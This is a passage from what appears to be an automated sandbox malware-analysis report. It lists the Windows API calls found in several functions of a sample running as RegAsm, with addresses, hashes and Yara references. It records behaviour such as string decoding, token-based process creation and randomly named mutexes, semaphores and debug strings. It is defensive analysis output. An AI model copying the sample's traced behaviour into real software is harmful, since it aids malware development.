                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000005D6,00000000,?,00000000,?,74DF2F20), ref: 0040F165
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F16C
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(tv49i65z7,?,00000000,?,74DF2F20), ref: 0040F177
                                                                  • Part of subcall function 0040F012: FindFirstFileA.KERNEL32(s_t4ckbkwe,?,?,00000000,?,74DF2F20), ref: 0040F185
                                                                  • Part of subcall function 0040F012: FindClose.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F18C
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_qjkqlbwl), ref: 0040F1A1
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t9kx5wueg,?,00000000,?,74DF2F20), ref: 0040F1AA
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1B7
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(b4j4f6xx,jcezxitk,?,00000000,?,74DF2F20), ref: 0040F1C7
                                                                  • Part of subcall function 0040F012: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLamfolgz0), ref: 0040F1D8
                                                                  • Part of subcall function 0040F012: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,00000000,?,74DF2F20), ref: 0040F1E0
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t1v6z4di9,?,00000000,?,74DF2F20), ref: 0040F1E7
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXdxglk35i,?,00000000,?,74DF2F20), ref: 0040F1F0
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F1FB
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,00000461,?,00000000,?,74DF2F20), ref: 0040F223
                                                                  • Part of subcall function 0040F012: GlobalFree.KERNEL32(?), ref: 0040F22C
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004085F0
                                                                  • Part of subcall function 0040F012: RegOpenKeyExA.ADVAPI32(80000001,regwog66qaw,00000000,00020019,?,?,00000000,?,74DF2F20), ref: 0040F217
                                                                • LocalFree.KERNEL32(00000000), ref: 00408716
                                                                • LocalFree.KERNEL32(004081BE), ref: 0040871F
                                                                • LocalFree.KERNEL32(004081BE), ref: 00408726
                                                                • LocalFree.KERNEL32(00000000), ref: 0040872D
                                                                • FindClose.KERNEL32(004096D2), ref: 00408754
                                                                • LocalFree.KERNEL32(?), ref: 0040875D
                                                                • LocalFree.KERNEL32(00000000), ref: 0040876D
                                                                • LocalFree.KERNEL32(00000000), ref: 00408774
                                                                • LocalFree.KERNEL32(004081BE), ref: 0040877B
                                                                • LocalFree.KERNEL32(00000000), ref: 00408782
                                                                • LocalFree.KERNEL32(004081BE), ref: 0040878B
                                                                • LocalFree.KERNEL32(004081BE), ref: 00408794
                                                                • LocalFree.KERNEL32(00000000), ref: 0040879B
                                                                  • Part of subcall function 0040F788: LocalAlloc.KERNEL32(00000000,0000026E,00000000,?,0000020A), ref: 0040F79F
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F7AD
                                                                  • Part of subcall function 0040F788: LocalFree.KERNEL32(00000000), ref: 0040F7B0
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regnzv4wvxn,00000000,00020019,?), ref: 0040F7CA
                                                                  • Part of subcall function 0040F788: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_v4tqtxno), ref: 0040F7D9
                                                                  • Part of subcall function 0040F788: SetEvent.KERNEL32(00000000), ref: 0040F7E2
                                                                  • Part of subcall function 0040F788: ResetEvent.KERNEL32(00000000), ref: 0040F7E9
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_8zhp33zt), ref: 0040F7F7
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F808
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(ttorgxv5m), ref: 0040F81C
                                                                  • Part of subcall function 0040F788: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf91r4xcv), ref: 0040F829
                                                                  • Part of subcall function 0040F788: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040F834
                                                                  • Part of subcall function 0040F788: CreateMutexA.KERNEL32(00000000,00000000,MTX5u8ptwy0), ref: 0040F843
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(nhy1vzmm,wfy3i05h), ref: 0040F85A
                                                                  • Part of subcall function 0040F788: ReleaseMutex.KERNEL32(00410AB3), ref: 0040F863
                                                                  • Part of subcall function 0040F788: OutputDebugStringA.KERNEL32(t1pi8p487), ref: 0040F86E
                                                                  • Part of subcall function 0040F788: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_fgohzvee), ref: 0040F879
                                                                  • Part of subcall function 0040F788: CancelWaitableTimer.KERNEL32(00000000), ref: 0040F880
                                                                  • Part of subcall function 0040F788: GetLastError.KERNEL32 ref: 0040F882
                                                                  • Part of subcall function 0040F788: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A8C,00000000), ref: 0040F892
                                                                  • Part of subcall function 0040F788: RegOpenKeyExA.ADVAPI32(80000001,regr3z819eq,00000000,00020019,?), ref: 0040F8AF
                                                                  • Part of subcall function 0040F788: CloseHandle.KERNEL32(00000000), ref: 0040F8B6
                                                                  • Part of subcall function 0040F788: SetEnvironmentVariableA.KERNEL32(wem6yeez,xjah9ors), ref: 0040F8C6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$CreateFree$TimerWaitable$DebugOutputString$ErrorEventLastMutexReleaseSemaphore$CloseEnvironmentFileFindVariable$AllocCancel$MappingOpen$ChangeNotificationResetlstrlen$FirstGlobalHandleSize
                                                                • String ID:
                                                                • API String ID: 101571558-0
                                                                • Opcode ID: 8b9897b7521b4d926a26173c100bc1d47dcb26685dd046a30849bd6a120b6ceb
                                                                • Instruction ID: 185cb91d7132478a3a6460e69a7a066de90890197c4a3ee621cf0f63ca6bc393
                                                                • Opcode Fuzzy Hash: 8b9897b7521b4d926a26173c100bc1d47dcb26685dd046a30849bd6a120b6ceb
                                                                • Instruction Fuzzy Hash: 8D716E71A00605EFDB149FB4DC88EEE7BB5FBC9300F108179F511A7291DB7899019BA8
                                                                Function 0040823C Relevance: 6.1, APIs: 4, Instructions: 137encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CryptStringToBinaryA.CRYPT32(00408903,00000000), ref: 0040827F
                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040832F
                                                                • LocalFree.KERNEL32(00000000), ref: 00408349
                                                                • LocalFree.KERNEL32(?), ref: 004083A0
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
                                                                • String ID:
                                                                • API String ID: 565018292-0
                                                                • Opcode ID: 35e3cf4c4005a3257d34d9b3a50ca3b6dc232470a654a9fe04234037f1d280f7
                                                                • Instruction ID: e31ddda595cc7c8eaa039688536fd1fb8b0197a7ec866f80cd1fd27863d7b33c
                                                                • Opcode Fuzzy Hash: 35e3cf4c4005a3257d34d9b3a50ca3b6dc232470a654a9fe04234037f1d280f7
                                                                • Instruction Fuzzy Hash: 88414771A00605EFDB15CBA9DC85FFEBBB9EF88700F108069E904E72A0DB755901CB69
                                                                Function 004015BE Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • StrCpyW.SHLWAPI(?,00000000), ref: 0040161A
                                                                • LocalFree.KERNEL32(00000000), ref: 00401621
                                                                • LocalFree.KERNEL32(00000000), ref: 0040162C
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeLocal
                                                                • String ID:
                                                                • API String ID: 2826327444-0
                                                                • Opcode ID: 2eeda22f774a76b6c730be38979e7fb361d80397da193e2d03fdf794d8dea2cd
                                                                • Instruction ID: dd8d91f4e05e92852b8a506f3c80202d8f16b8ee41fe3d10fcc8e94d80cd0937
                                                                • Opcode Fuzzy Hash: 2eeda22f774a76b6c730be38979e7fb361d80397da193e2d03fdf794d8dea2cd
                                                                • Instruction Fuzzy Hash: 8601BC72601505FBEB158BA4EC94FEF7BACEF8C340F044034B601E61A0DA71DD018AA8
                                                                Function 00401639 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: _'@
                                                                • API String ID: 0-884491114
                                                                • Opcode ID: 62c5eacd511d9bd0286bd1fb312c3155aab2c5f424a6ee9a99b24286b04b0023
                                                                • Instruction ID: 9a2f12ced6f6809d0513f3e5e0ec14d95bc473e9e98c5950382a7a734661f5dc
                                                                • Opcode Fuzzy Hash: 62c5eacd511d9bd0286bd1fb312c3155aab2c5f424a6ee9a99b24286b04b0023
                                                                • Instruction Fuzzy Hash: B9018F71211622BFDB258B8ADC44EEB7FACEF4A7A0B040024F608D3360C6719D00CBE8
                                                                Function 0040739F Relevance: 59.2, APIs: 47, Instructions: 472memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004073CD
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00407421
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00407475
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004074C9
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLocal
                                                                • String ID:
                                                                • API String ID: 3494564517-0
                                                                • Opcode ID: 6a73c78e461c43ece6402b6fc2f673a9bfac05cc8c5403a28d99cb2634bd4ea7
                                                                • Instruction ID: aa608bd77a511a3ddcf80ac69c5d68bc3ea3093b3b88428faeb8409a32030196
                                                                • Opcode Fuzzy Hash: 6a73c78e461c43ece6402b6fc2f673a9bfac05cc8c5403a28d99cb2634bd4ea7
                                                                • Instruction Fuzzy Hash: 03F16B32D01616EFDB159BE5DC48EEE7FB5FB88310B048065EA15B32A0DB346D01DBA9
                                                                Function 0040973E Relevance: 33.3, APIs: 22, Instructions: 311memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409769
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004097BD
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409811
                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409865
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLocal
                                                                • String ID:
                                                                • API String ID: 3494564517-0
                                                                • Opcode ID: 231a35752a7417582888611e2cc3200ecf35a20df2f306b517736ffbeaa1261e
                                                                • Instruction ID: 4bb3e64e58a5201c25aba6b82b1ba4f9ecd234a90966ec2042f23147324a420c
                                                                • Opcode Fuzzy Hash: 231a35752a7417582888611e2cc3200ecf35a20df2f306b517736ffbeaa1261e
                                                                • Instruction Fuzzy Hash: E0A18572A00615EFDB119BE4DC85EEE7BB5FB88300B008479F915A72A1DB749D01DBA8
                                                                Function 00407DE4 Relevance: 11.5, APIs: 9, Instructions: 275memorystringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(012524F0,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?,?), ref: 00407F1F
                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?), ref: 00407F44
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?,?), ref: 00407FFF
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F02F
                                                                  • Part of subcall function 0040F012: lstrlenW.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F034
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,74DF2F20), ref: 0040F04D
                                                                  • Part of subcall function 0040F012: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000A28,00000000,?,?,00000000,?,74DF2F20), ref: 0040F06C
                                                                  • Part of subcall function 0040F012: FindCloseChangeNotification.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F073
                                                                  • Part of subcall function 0040F012: LocalAlloc.KERNEL32(00000000,000005DD,?,00000000,?,74DF2F20), ref: 0040F07F
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F08D
                                                                  • Part of subcall function 0040F012: LocalFree.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F090
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pg3esy2g), ref: 0040F09E
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0A5
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNELBASE(t26t01mzg,?,00000000,?,74DF2F20), ref: 0040F0B6
                                                                  • Part of subcall function 0040F012: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_n39w6qzp,?,00000000,?,74DF2F20), ref: 0040F0C3
                                                                  • Part of subcall function 0040F012: SetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0CC
                                                                  • Part of subcall function 0040F012: ResetEvent.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F0D3
                                                                  • Part of subcall function 0040F012: CreateMutexA.KERNEL32(00000000,00000000,MTXid6eg7kl,?,00000000,?,74DF2F20), ref: 0040F0E2
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(kswx2kex,87xo3fjd,?,00000000,?,74DF2F20), ref: 0040F0FF
                                                                  • Part of subcall function 0040F012: ReleaseMutex.KERNEL32(?,?,00000000,?,74DF2F20), ref: 0040F104
                                                                  • Part of subcall function 0040F012: SetEnvironmentVariableA.KERNEL32(mjtppkej,54dhluqg,?,00000000,?,74DF2F20), ref: 0040F114
                                                                  • Part of subcall function 0040F012: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_b67hznar), ref: 0040F131
                                                                  • Part of subcall function 0040F012: GetLastError.KERNEL32(?,00000000,?,74DF2F20), ref: 0040F139
                                                                  • Part of subcall function 0040F012: CancelWaitableTimer.KERNEL32(00000000,?,00000000,?,74DF2F20), ref: 0040F140
                                                                  • Part of subcall function 0040F012: OutputDebugStringA.KERNEL32(t7fwgbo5x,?,00000000,?,74DF2F20), ref: 0040F14B
                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004076B4,?,?,?), ref: 00408008
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 00408047
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 00408099
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 004080A0
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 004080F5
                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004076B4,?,?,?,00000000,00000000,00000000), ref: 004080FC
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Local$Free$Create$TimerWaitable$AllocEventlstrlen$CancelDebugEnvironmentErrorLastMutexOutputStringVariable$ChangeCloseFileFindMappingNotificationReleaseReset
                                                                • String ID:
                                                                • API String ID: 2655230718-0
                                                                • Opcode ID: 64d9b6c2c412e54a3afffb7ef69818512bd1b8ef472c2af62c91e45db2a4582d
                                                                • Instruction ID: e8c54be81e282ae7f25457206fc720eb92eefaefe2b21bcad783986bc7fb301b
                                                                • Opcode Fuzzy Hash: 64d9b6c2c412e54a3afffb7ef69818512bd1b8ef472c2af62c91e45db2a4582d
                                                                • Instruction Fuzzy Hash: 10A16C71900609EBDB15DFA4DD84AEE7BB5FF8C300F008029FA15B7290DB75AD118BA8
                                                                Function 0040E38D Relevance: 6.1, APIs: 4, Instructions: 87processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNEL32(?), ref: 0040E42B
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E445
                                                                • CreateProcessWithTokenW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E45F
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E462
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateFileModuleNameProcessTokenWith
                                                                • String ID:
                                                                • API String ID: 236770008-0
                                                                • Opcode ID: fb3642c99ef25df5427d8f8cd79ba35279fbcc8ced8bc4e3d89e0e5351764b76
                                                                • Instruction ID: 757f429f4481b7629bc31153a339e2efa72cb715d31ceff56c811d97ed8f1a6b
                                                                • Opcode Fuzzy Hash: fb3642c99ef25df5427d8f8cd79ba35279fbcc8ced8bc4e3d89e0e5351764b76
                                                                • Instruction Fuzzy Hash: 4A216D71640209FBDB14DBA1DC85FEE7B79EB88710F0040B5FA05E61D0DAB49A41CB64